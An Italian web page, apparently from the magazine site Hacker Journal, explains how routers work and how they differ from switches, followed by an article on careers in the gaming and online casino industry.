Un router è un dispositivo di rete che connette diverse reti e instrada il traffico di rete tra di esse. Un router è progettato per gestire il traffico di rete su diverse reti, comprese le reti LAN e WAN (Wide Area Network). Questo dispositivo è in grado di determinare il percorso più efficiente per instradare i dati sulla rete e di farlo in modo sicuro.
Un router funziona esaminando gli indirizzi IP dei dati in transito e inviandoli al percorso appropriato sulla rete. Gli indirizzi IP sono gli identificatori univoci assegnati a ogni dispositivo di rete sulla rete Internet. Quando un dispositivo sulla rete desidera inviare dati a un altro dispositivo su una rete diversa, i dati vengono inviati al router. Il router esamina l’indirizzo IP di destinazione e invia i dati al percorso appropriato sulla rete. Ciò significa che il router è in grado di gestire il traffico di rete su diverse reti e di instradare i dati in modo sicuro e efficiente.
Quali sono le differenze tra switch e router
Le principali differenze tra switch e router sono legate alle loro funzioni e alla loro capacità di gestire il traffico di rete. Uno switch è progettato per gestire il traffico di rete all’interno di una singola rete locale, ovvero una LAN (Local Area Network), e connettere diversi dispositivi tra di loro. Un router, d’altra parte, è progettato per gestire il traffico di rete tra diverse reti, inclusi i collegamenti tra reti locali e la connessione a Internet.
In termini di come instradano i dati, uno switch utilizza l’indirizzo MAC (Media Access Control) dei dispositivi di rete per inviare i dati alla giusta destinazione. Ciò significa che gli switch inviano i dati solo ai dispositivi che devono riceverli, riducendo la congestione di rete e migliorando le prestazioni complessive. Un router, invece, instrada i dati in base all’indirizzo IP (Internet Protocol) di destinazione. Questo significa che i router sono in grado di determinare il percorso migliore per inviare i dati su diverse reti, che possono includere molteplici punti intermedi tra la sorgente e la destinazione.
Articoli
Lavorare nel mondo del gaming

L’intrattenimento domestico e il settore dei giochi, che si tratti di videogame o di live casinò come Betfair, sono da diversi anni in piena crescita, di conseguenza sono sempre più numerose le figure lavorative richieste dalle aziende che operano in questo settore. Ecco quali sono le professioni più in voga nell’industria dei videogiochi e quali sono le più vantaggiose opportunità di guadagno all’interno del gaming.
Sviluppatore
Sviluppatori e programmatori sono due professioni essenziali nella produzione dei videogiochi. Se il programmatore si occupa prevalentemente di porre le fondamenta per la creazione del titolo, lo sviluppatore riveste il ruolo di coordinatore, andando a verificare la correttezza del lavoro del programmatore e a integrare il tutto operando sulla grafica, sui suoni e, in generale, sulla meccanica del gioco.
Sceneggiatore
Determinati titoli, in primis i fantasy, si incentrano su trame ricche di dettagli, paragonabili in tutto e per tutto alle sceneggiature dei film. Proprio per questa ragione è imprescindibile la figura dello sceneggiatore, ovvero colui che si occupa di rendere entusiasmanti e coerenti le caratteristiche dei personaggi, i dialoghi e, in generale, la storia del videogame.
Tester
Il ruolo di tester è uno dei più ambiti dai gamer. Prima di essere commercializzato, ogni titolo viene testato a fondo, sia per individuare la presenza di eventuali errori e bug, sia per accertarsi che trama, regole e sceneggiatura funzionino alla perfezione. Queste verifiche vengono svolte dai tester, ai quali è richiesto, inoltre, di fornire dei suggerimenti per migliorare la qualità del gioco.
Compositore di colonne sonore
L’aspetto sonoro è basilare in ogni videogame. Se per alcuni titoli, come ad esempio quelli sportivi, l’attenzione è concentrata prevalentemente sulla riproduzione degli effetti sonori e sulla telecronaca, per i giochi che presentano una trama è imprescindibile realizzare un’avvincente colonna sonora. Il primo ruolo viene ricoperto dal tecnico del suono, mentre il secondo è svolto solitamente da veri e propri compositori musicali.
Gamer professionista
Riuscire a far diventare quella dei videogiochi una professione è il sogno di molti gamer, alcuni dei quali riescono a trasformarlo in realtà. Grazie agli eSports, infatti, è possibile ottenere importanti guadagni partecipando ai tornei che si svolgono sia online sia in luoghi fisici. Diventare un gamer professionista richiede allenamenti specifici e grande attenzione verso il proprio corpo, esattamente ciò che è richiesto a un atleta.
Content creator
Piattaforme come YouTube e Twitch consentono ai gamer di pubblicare i video delle proprie partite e, di conseguenza, guadagnare dei soldi a seconda alle visualizzazioni ottenute e ad altri aspetti. Quella del content creator è una grande opportunità per chi ama realizzare video e, in questo caso, non è necessario essere preparati come i gamer professionisti.
Croupier
Il mondo degli iGame, ovvero i giochi che si basano sulle scommesse, come ad esempio le puntate al blackjack online o alla roulette, è in forte espansione. Grazie ai casinò virtuali è possibile giocare proprio come all’interno di una reale casa da gioco, per cui sono richieste figure come dealer e croupier, onde permettere ai giocatori di puntare al proprio gioco preferito.
-
News2 anni ago
Hacker Journal 269
-
News6 anni ago
Abbonati ad Hacker Journal!
-
Articoli7 mesi ago
Parrot Security OS: Linux all’italiana- La distro superblindata
-
Articoli2 anni ago
Guida: Come accedere al Dark Web in modo Anonimo
-
Articoli5 anni ago
Superare i firewall
-
News3 anni ago
Le migliori Hacker Girl di tutto il mondo
-
Articoli4 anni ago
Come Scoprire password Wi-Fi con il nuovo attacco su WPA / WPA2
-
News6 anni ago
Accademia Hacker Journal